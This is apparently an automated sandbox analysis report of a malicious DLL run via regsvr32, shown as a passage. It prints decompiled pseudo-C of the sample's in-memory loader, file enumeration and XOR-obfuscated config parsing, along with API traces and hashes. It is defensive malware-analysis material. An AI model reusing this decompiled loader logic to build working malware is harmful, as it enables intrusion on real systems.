                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 85%
                                                                                                                                                                                                                                    			E026D1E11(void* __eax) {
                                                                                                                                                                                                                                    				char _v8;
                                                                                                                                                                                                                                    				void* _v12;
                                                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                                                    				void* _t18;
                                                                                                                                                                                                                                    				long _t26;
                                                                                                                                                                                                                                    				long _t29;
                                                                                                                                                                                                                                    				intOrPtr _t40;
                                                                                                                                                                                                                                    				void* _t41;
                                                                                                                                                                                                                                    				intOrPtr* _t42;
                                                                                                                                                                                                                                    				void* _t44;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t41 = __eax;
                                                                                                                                                                                                                                    				_t16 =  *0x26d414c;
                                                                                                                                                                                                                                    				_t33 =  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x26d414c - 0x63698bc4 &  !( *0x26d414c - 0x63698bc4);
                                                                                                                                                                                                                                    				_t18 = E026D1A0F( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x26d414c - 0x63698bc4 &  !( *0x26d414c - 0x63698bc4),  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x26d414c - 0x63698bc4 &  !( *0x26d414c - 0x63698bc4), _t16 + 0x9c96647d,  &_v8,  &_v12); // executed
                                                                                                                                                                                                                                    				if(_t18 != 0) {
                                                                                                                                                                                                                                    					_t29 = 8;
                                                                                                                                                                                                                                    					goto L8;
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					_t40 = _v8;
                                                                                                                                                                                                                                    					_t29 = E026D125B(_t33, _t40, _t41);
                                                                                                                                                                                                                                    					if(_t29 == 0) {
                                                                                                                                                                                                                                    						_t44 =  *((intOrPtr*)(_t40 + 0x3c)) + _t40;
                                                                                                                                                                                                                                    						_t29 = E026D1745(_t40, _t44);
                                                                                                                                                                                                                                    						if(_t29 == 0) {
                                                                                                                                                                                                                                    							_t26 = E026D1179(_t44, _t40); // executed
                                                                                                                                                                                                                                    							_t29 = _t26;
                                                                                                                                                                                                                                    							if(_t29 == 0) {
                                                                                                                                                                                                                                    								_push(_t26);
                                                                                                                                                                                                                                    								_push(1);
                                                                                                                                                                                                                                    								_push(_t40);
                                                                                                                                                                                                                                    								if( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x28)) + _t40))() == 0) {
                                                                                                                                                                                                                                    									_t29 = GetLastError();
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					_t42 = _v12;
                                                                                                                                                                                                                                    					 *((intOrPtr*)(_t42 + 0x18))( *((intOrPtr*)(_t42 + 0x1c))( *_t42));
                                                                                                                                                                                                                                    					E026D1DFC(_t42);
                                                                                                                                                                                                                                    					L8:
                                                                                                                                                                                                                                    					return _t29;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    			}














                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 026D1A0F: GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,026D1E4D,?,?,?,?,?,00000002,?,026D1401), ref: 026D1A33
                                                                                                                                                                                                                                      • Part of subcall function 026D1A0F: GetProcAddress.KERNEL32(00000000,?), ref: 026D1A55
                                                                                                                                                                                                                                      • Part of subcall function 026D1A0F: GetProcAddress.KERNEL32(00000000,?), ref: 026D1A6B
                                                                                                                                                                                                                                      • Part of subcall function 026D1A0F: GetProcAddress.KERNEL32(00000000,?), ref: 026D1A81
                                                                                                                                                                                                                                      • Part of subcall function 026D1A0F: GetProcAddress.KERNEL32(00000000,?), ref: 026D1A97
                                                                                                                                                                                                                                      • Part of subcall function 026D1A0F: GetProcAddress.KERNEL32(00000000,?), ref: 026D1AAD
                                                                                                                                                                                                                                      • Part of subcall function 026D125B: memcpy.NTDLL(?,?,?), ref: 026D1288
                                                                                                                                                                                                                                      • Part of subcall function 026D125B: memcpy.NTDLL(?,?,?), ref: 026D12BB
                                                                                                                                                                                                                                      • Part of subcall function 026D1745: LoadLibraryA.KERNEL32(?,?,00000000,?,?), ref: 026D177D
                                                                                                                                                                                                                                      • Part of subcall function 026D1179: VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 026D11B2
                                                                                                                                                                                                                                      • Part of subcall function 026D1179: VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 026D1227
                                                                                                                                                                                                                                      • Part of subcall function 026D1179: GetLastError.KERNEL32 ref: 026D122D
                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,026D1401), ref: 026D1E8F
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.522835823.00000000026D0000.00000040.00020000.sdmp, Offset: 026D0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.523067360.00000000026D5000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_26d0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: AddressProc$ErrorLastProtectVirtualmemcpy$HandleLibraryLoadModule
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2673762927-0
                                                                                                                                                                                                                                    • Opcode ID: 1e0e7f40eb3b6c41a9d3a95be717bd9992f0b0a79e56f18d29dbf3a00e9859b9
                                                                                                                                                                                                                                    • Instruction ID: 6b9cebcb2dc87125c8f23bb3939e230fba9b1132e349114b75cb0f55c1d0c987
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1e0e7f40eb3b6c41a9d3a95be717bd9992f0b0a79e56f18d29dbf3a00e9859b9
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F8112236E0071DABD7209BB5CC80EAF777DAF8A2147044499E909D7640E7F0ED058BE0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 70%
                                                                                                                                                                                                                                    			E023E21CD(void* __ecx, signed char* _a4) {
                                                                                                                                                                                                                                    				void* _v8;
                                                                                                                                                                                                                                    				void* _t8;
                                                                                                                                                                                                                                    				signed short _t11;
                                                                                                                                                                                                                                    				signed int _t12;
                                                                                                                                                                                                                                    				signed int _t14;
                                                                                                                                                                                                                                    				intOrPtr _t15;
                                                                                                                                                                                                                                    				void* _t19;
                                                                                                                                                                                                                                    				signed short* _t22;
                                                                                                                                                                                                                                    				void* _t24;
                                                                                                                                                                                                                                    				intOrPtr* _t27;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t24 = 0;
                                                                                                                                                                                                                                    				_push(0);
                                                                                                                                                                                                                                    				_t19 = 1;
                                                                                                                                                                                                                                    				_t27 = 0x23ed330;
                                                                                                                                                                                                                                    				E023E84D5();
                                                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                                                    					_t8 = E023E12D4(_a4,  &_v8); // executed
                                                                                                                                                                                                                                    					if(_t8 == 0) {
                                                                                                                                                                                                                                    						break;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					_push(_v8);
                                                                                                                                                                                                                                    					_t14 = 0xd;
                                                                                                                                                                                                                                    					_t15 = E023E809F(_t14);
                                                                                                                                                                                                                                    					if(_t15 == 0) {
                                                                                                                                                                                                                                    						HeapFree( *0x23ed238, 0, _v8);
                                                                                                                                                                                                                                    						break;
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						 *_t27 = _t15;
                                                                                                                                                                                                                                    						_t27 = _t27 + 4;
                                                                                                                                                                                                                                    						_t24 = _t24 + 1;
                                                                                                                                                                                                                                    						if(_t24 < 3) {
                                                                                                                                                                                                                                    							continue;
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					L7:
                                                                                                                                                                                                                                    					_push(1);
                                                                                                                                                                                                                                    					E023E84D5();
                                                                                                                                                                                                                                    					if(_t19 != 0) {
                                                                                                                                                                                                                                    						_t22 =  *0x23ed338; // 0x4cc9b70
                                                                                                                                                                                                                                    						_t11 =  *_t22 & 0x0000ffff;
                                                                                                                                                                                                                                    						if(_t11 < 0x61 || _t11 > 0x7a) {
                                                                                                                                                                                                                                    							_t12 = _t11 & 0x0000ffff;
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							_t12 = (_t11 & 0x0000ffff) - 0x20;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						 *_t22 = _t12;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					return _t19;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t19 = 0;
                                                                                                                                                                                                                                    				goto L7;
                                                                                                                                                                                                                                    			}














                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 023E84D5: GetProcAddress.KERNEL32(36776F57,023E21E5), ref: 023E84F0
                                                                                                                                                                                                                                      • Part of subcall function 023E12D4: RtlAllocateHeap.NTDLL(00000000,63699BC3,00000000), ref: 023E12FF
                                                                                                                                                                                                                                      • Part of subcall function 023E12D4: RtlAllocateHeap.NTDLL(00000000,63699BC3), ref: 023E1321
                                                                                                                                                                                                                                      • Part of subcall function 023E12D4: memset.NTDLL ref: 023E133B
                                                                                                                                                                                                                                      • Part of subcall function 023E12D4: CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 023E1379
                                                                                                                                                                                                                                      • Part of subcall function 023E12D4: GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 023E138D
                                                                                                                                                                                                                                      • Part of subcall function 023E12D4: FindCloseChangeNotification.KERNELBASE(00000000), ref: 023E13A4
                                                                                                                                                                                                                                      • Part of subcall function 023E12D4: StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 023E13B0
                                                                                                                                                                                                                                      • Part of subcall function 023E12D4: lstrcat.KERNEL32(?,642E2A5C), ref: 023E13F1
                                                                                                                                                                                                                                      • Part of subcall function 023E12D4: FindFirstFileA.KERNELBASE(?,?), ref: 023E1407
                                                                                                                                                                                                                                      • Part of subcall function 023E809F: lstrlen.KERNEL32(?,00000000,023ED330,00000001,023E2200,023ED00C,023ED00C,00000000,00000005,00000000,00000000,?,?,?,023E96C1,023E23E9), ref: 023E80A8
                                                                                                                                                                                                                                      • Part of subcall function 023E809F: mbstowcs.NTDLL ref: 023E80CF
                                                                                                                                                                                                                                      • Part of subcall function 023E809F: memset.NTDLL ref: 023E80E1
                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,023ED00C,023ED00C,023ED00C,00000000,00000005,00000000,00000000,?,?,?,023E96C1,023E23E9,023ED00C,?,023E23E9), ref: 023E221C
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.521955532.00000000023E1000.00000020.00020000.sdmp, Offset: 023E0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.521844516.00000000023E0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522125051.00000000023EC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522265607.00000000023ED000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522450053.00000000023EF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_23e0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: FileHeap$AllocateFindmemset$AddressChangeCloseCreateFirstFreeNotificationProcTimelstrcatlstrlenmbstowcs
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 983081259-0
                                                                                                                                                                                                                                    • Opcode ID: 2a9c51fc96f0a6182d4e496a96170c5eeecf41111a9bec162075e08d5c1bedf3
                                                                                                                                                                                                                                    • Instruction ID: 1f0105cb88fcccbb204d072958012f0aea035eda392092eaef0d28ad1de15e8e
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2a9c51fc96f0a6182d4e496a96170c5eeecf41111a9bec162075e08d5c1bedf3
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7A01F976A20124EAEF105EE5DC80B6B729DEB45358F400035ED46CA0D0D765DC499B21
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E023E1262(void** __esi, intOrPtr _a4, unsigned int _a8, void* _a12) {
                                                                                                                                                                                                                                    				signed short _t18;
                                                                                                                                                                                                                                    				void* _t24;
                                                                                                                                                                                                                                    				signed int _t26;
                                                                                                                                                                                                                                    				signed short _t27;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				if(_a4 != 0) {
                                                                                                                                                                                                                                    					_t18 = E023E9318(_a4, _a8, _a12, __esi); // executed
                                                                                                                                                                                                                                    					_t27 = _t18;
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					_t27 = E023E6BFA(0, 0x80000002, _a8, _a12,  &_a12,  &_a8);
                                                                                                                                                                                                                                    					if(_t27 == 0) {
                                                                                                                                                                                                                                    						_t26 = _a8 >> 1;
                                                                                                                                                                                                                                    						if(_t26 == 0) {
                                                                                                                                                                                                                                    							_t27 = 2;
                                                                                                                                                                                                                                    							HeapFree( *0x23ed238, 0, _a12);
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							_t24 = _a12;
                                                                                                                                                                                                                                    							 *(_t24 + _t26 * 2 - 2) =  *(_t24 + _t26 * 2 - 2) & _t27;
                                                                                                                                                                                                                                    							 *__esi = _t24;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return _t27;
                                                                                                                                                                                                                                    			}








                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?,00000000,80000002,76D7F710,?,?,76D7F710,00000000,?,023E743A,?,004F0053,04CC9388,00000000,?), ref: 023E12AD
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.521955532.00000000023E1000.00000020.00020000.sdmp, Offset: 023E0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.521844516.00000000023E0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522125051.00000000023EC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522265607.00000000023ED000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522450053.00000000023EF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_23e0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: FreeHeap
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3298025750-0
                                                                                                                                                                                                                                    • Opcode ID: 7e268a072798635bdedf68c98e2a0776e02dd9eccfa01ea905991378018247df
                                                                                                                                                                                                                                    • Instruction ID: 01932a958e41af1097b429662cf2e5cd5e510ef97638c842ba847881f24dbb47
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7e268a072798635bdedf68c98e2a0776e02dd9eccfa01ea905991378018247df
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 42011232140259FBCF219F54CC01FAE3BAAEB54350F148429FA5A9A1A0D731D929DF50
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 88%
                                                                                                                                                                                                                                    			E023E2436(intOrPtr* __edi) {
                                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                                    				char _v12;
                                                                                                                                                                                                                                    				intOrPtr _v16;
                                                                                                                                                                                                                                    				intOrPtr _t15;
                                                                                                                                                                                                                                    				intOrPtr* _t21;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t21 = __edi;
                                                                                                                                                                                                                                    				_push( &_v12);
                                                                                                                                                                                                                                    				_push(__edi);
                                                                                                                                                                                                                                    				_v8 = 0x1d4c0;
                                                                                                                                                                                                                                    				_t15 =  *((intOrPtr*)( *__edi + 0xe0))();
                                                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                                                    					_v16 = _t15;
                                                                                                                                                                                                                                    					Sleep(0x1f4); // executed
                                                                                                                                                                                                                                    					if(_v12 == 4) {
                                                                                                                                                                                                                                    						break;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					if(_v8 == 0) {
                                                                                                                                                                                                                                    						L4:
                                                                                                                                                                                                                                    						_t15 =  *((intOrPtr*)( *_t21 + 0xe0))(_t21,  &_v12);
                                                                                                                                                                                                                                    						continue;
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						if(_v8 <= 0x1f4) {
                                                                                                                                                                                                                                    							_v16 = 0x80004004;
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							_v8 = _v8 - 0x1f4;
                                                                                                                                                                                                                                    							goto L4;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					L8:
                                                                                                                                                                                                                                    					return _v16;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				goto L8;
                                                                                                                                                                                                                                    			}









                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • Sleep.KERNELBASE(000001F4), ref: 023E247E
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.521955532.00000000023E1000.00000020.00020000.sdmp, Offset: 023E0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.521844516.00000000023E0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522125051.00000000023EC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522265607.00000000023ED000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522450053.00000000023EF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_23e0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Sleep
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3472027048-0
                                                                                                                                                                                                                                    • Opcode ID: 543aa90d4c2946dcb4687a7d727fd70716c8f48f352722967e31a007fc2cf13d
                                                                                                                                                                                                                                    • Instruction ID: 8be2aefe10e9c5b2e854bf4a09597675ff7b59985856f59ab09644984386de01
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 543aa90d4c2946dcb4687a7d727fd70716c8f48f352722967e31a007fc2cf13d
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 88F04F71D01229EFDF04DB94C488AEEB7BCEF04304F1080AAE90267181D7B45B48CF61
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E023EA66E(void* __edx, void* __edi, void* _a4) {
                                                                                                                                                                                                                                    				int _t7;
                                                                                                                                                                                                                                    				int _t13;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t7 = E023E7323(__edx, __edi, _a4,  &_a4); // executed
                                                                                                                                                                                                                                    				_t13 = _t7;
                                                                                                                                                                                                                                    				if(_t13 != 0) {
                                                                                                                                                                                                                                    					memcpy(__edi, _a4, _t13);
                                                                                                                                                                                                                                    					 *((char*)(__edi + _t13)) = 0;
                                                                                                                                                                                                                                    					E023E9039(_a4);
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return _t13;
                                                                                                                                                                                                                                    			}






                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 023E7323: memcpy.NTDLL(00000000,00000090,00000002,00000002,023E685F,00000008,023E685F,023E685F,?,023E858C,023E685F), ref: 023E7359
                                                                                                                                                                                                                                      • Part of subcall function 023E7323: memset.NTDLL ref: 023E73CF
                                                                                                                                                                                                                                      • Part of subcall function 023E7323: memset.NTDLL ref: 023E73E3
                                                                                                                                                                                                                                    • memcpy.NTDLL(00000002,023E685F,00000000,00000002,023E685F,023E685F,023E685F,?,023E858C,023E685F,?,023E685F,00000002,?,?,023E2417), ref: 023EA68A
                                                                                                                                                                                                                                      • Part of subcall function 023E9039: HeapFree.KERNEL32(00000000,00000000,023E7F18,00000000,?,?,00000000), ref: 023E9045
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.521955532.00000000023E1000.00000020.00020000.sdmp, Offset: 023E0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.521844516.00000000023E0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522125051.00000000023EC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522265607.00000000023ED000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522450053.00000000023EF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_23e0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: memcpymemset$FreeHeap
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3053036209-0
                                                                                                                                                                                                                                    • Opcode ID: 10b87d9068704a00f4c0b83e48a122f1ee3d32e81302abe31c4643e426d095cc
                                                                                                                                                                                                                                    • Instruction ID: c25c872ec3324f389fe398857f06f28712ea9b846646a5df5308673ee29584f2
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 10b87d9068704a00f4c0b83e48a122f1ee3d32e81302abe31c4643e426d095cc
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 74E08672404238B6CF222A95DC00EFFBF5E9F45691F404011FE0A49240D621D91497E1
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                                                                    C-Code - Quality: 92%
                                                                                                                                                                                                                                    			E023E4094(int* __ecx) {
                                                                                                                                                                                                                                    				int _v8;
                                                                                                                                                                                                                                    				void* _v12;
                                                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                                                    				signed int _t20;
                                                                                                                                                                                                                                    				signed int _t25;
                                                                                                                                                                                                                                    				char* _t31;
                                                                                                                                                                                                                                    				char* _t32;
                                                                                                                                                                                                                                    				char* _t33;
                                                                                                                                                                                                                                    				char* _t34;
                                                                                                                                                                                                                                    				char* _t35;
                                                                                                                                                                                                                                    				void* _t36;
                                                                                                                                                                                                                                    				void* _t37;
                                                                                                                                                                                                                                    				void* _t38;
                                                                                                                                                                                                                                    				intOrPtr _t39;
                                                                                                                                                                                                                                    				void* _t41;
                                                                                                                                                                                                                                    				intOrPtr _t42;
                                                                                                                                                                                                                                    				intOrPtr _t43;
                                                                                                                                                                                                                                    				signed int _t46;
                                                                                                                                                                                                                                    				intOrPtr _t49;
                                                                                                                                                                                                                                    				signed int _t50;
                                                                                                                                                                                                                                    				signed int _t55;
                                                                                                                                                                                                                                    				void* _t57;
                                                                                                                                                                                                                                    				void* _t58;
                                                                                                                                                                                                                                    				signed int _t60;
                                                                                                                                                                                                                                    				signed int _t64;
                                                                                                                                                                                                                                    				signed int _t68;
                                                                                                                                                                                                                                    				signed int _t72;
                                                                                                                                                                                                                                    				signed int _t76;
                                                                                                                                                                                                                                    				signed int _t80;
                                                                                                                                                                                                                                    				void* _t85;
                                                                                                                                                                                                                                    				intOrPtr _t102;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t86 = __ecx;
                                                                                                                                                                                                                                    				_t20 =  *0x23ed278; // 0x63699bc3
                                                                                                                                                                                                                                    				if(E023E8748( &_v12,  &_v8, _t20 ^ 0x8241c5a7) != 0 && _v8 >= 0x90) {
                                                                                                                                                                                                                                    					 *0x23ed2d4 = _v12;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t25 =  *0x23ed278; // 0x63699bc3
                                                                                                                                                                                                                                    				if(E023E8748( &_v12,  &_v8, _t25 ^ 0xecd84622) == 0) {
                                                                                                                                                                                                                                    					_push(2);
                                                                                                                                                                                                                                    					_pop(0);
                                                                                                                                                                                                                                    					goto L60;
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					_t85 = _v12;
                                                                                                                                                                                                                                    					if(_t85 == 0) {
                                                                                                                                                                                                                                    						_t31 = 0;
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						_t80 =  *0x23ed278; // 0x63699bc3
                                                                                                                                                                                                                                    						_t31 = E023E3F7C(_t86, _t85, _t80 ^ 0x724e87bc);
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					if(_t31 != 0) {
                                                                                                                                                                                                                                    						_t86 =  &_v8;
                                                                                                                                                                                                                                    						if(StrToIntExA(_t31, 0,  &_v8) != 0) {
                                                                                                                                                                                                                                    							 *0x23ed240 = _v8;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					if(_t85 == 0) {
                                                                                                                                                                                                                                    						_t32 = 0;
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						_t76 =  *0x23ed278; // 0x63699bc3
                                                                                                                                                                                                                                    						_t32 = E023E3F7C(_t86, _t85, _t76 ^ 0x2b40cc40);
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					if(_t32 != 0) {
                                                                                                                                                                                                                                    						_t86 =  &_v8;
                                                                                                                                                                                                                                    						if(StrToIntExA(_t32, 0,  &_v8) != 0) {
                                                                                                                                                                                                                                    							 *0x23ed244 = _v8;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					if(_t85 == 0) {
                                                                                                                                                                                                                                    						_t33 = 0;
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						_t72 =  *0x23ed278; // 0x63699bc3
                                                                                                                                                                                                                                    						_t33 = E023E3F7C(_t86, _t85, _t72 ^ 0x3b27c2e6);
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					if(_t33 != 0) {
                                                                                                                                                                                                                                    						_t86 =  &_v8;
                                                                                                                                                                                                                                    						if(StrToIntExA(_t33, 0,  &_v8) != 0) {
                                                                                                                                                                                                                                    							 *0x23ed248 = _v8;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					if(_t85 == 0) {
                                                                                                                                                                                                                                    						_t34 = 0;
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						_t68 =  *0x23ed278; // 0x63699bc3
                                                                                                                                                                                                                                    						_t34 = E023E3F7C(_t86, _t85, _t68 ^ 0x0602e249);
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					if(_t34 != 0) {
                                                                                                                                                                                                                                    						_t86 =  &_v8;
                                                                                                                                                                                                                                    						if(StrToIntExA(_t34, 0,  &_v8) != 0) {
                                                                                                                                                                                                                                    							 *0x23ed004 = _v8;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					if(_t85 == 0) {
                                                                                                                                                                                                                                    						_t35 = 0;
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						_t64 =  *0x23ed278; // 0x63699bc3
                                                                                                                                                                                                                                    						_t35 = E023E3F7C(_t86, _t85, _t64 ^ 0x3603764c);
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					if(_t35 != 0) {
                                                                                                                                                                                                                                    						_t86 =  &_v8;
                                                                                                                                                                                                                                    						if(StrToIntExA(_t35, 0,  &_v8) != 0) {
                                                                                                                                                                                                                                    							 *0x23ed02c = _v8;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					if(_t85 == 0) {
                                                                                                                                                                                                                                    						_t36 = 0;
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						_t60 =  *0x23ed278; // 0x63699bc3
                                                                                                                                                                                                                                    						_t36 = E023E3F7C(_t86, _t85, _t60 ^ 0x2cc1f2fd);
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					if(_t36 != 0) {
                                                                                                                                                                                                                                    						_push(_t36);
                                                                                                                                                                                                                                    						_t57 = 0x10;
                                                                                                                                                                                                                                    						_t58 = E023E6ED2(_t57);
                                                                                                                                                                                                                                    						if(_t58 != 0) {
                                                                                                                                                                                                                                    							_push(_t58);
                                                                                                                                                                                                                                    							E023EA5D6();
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
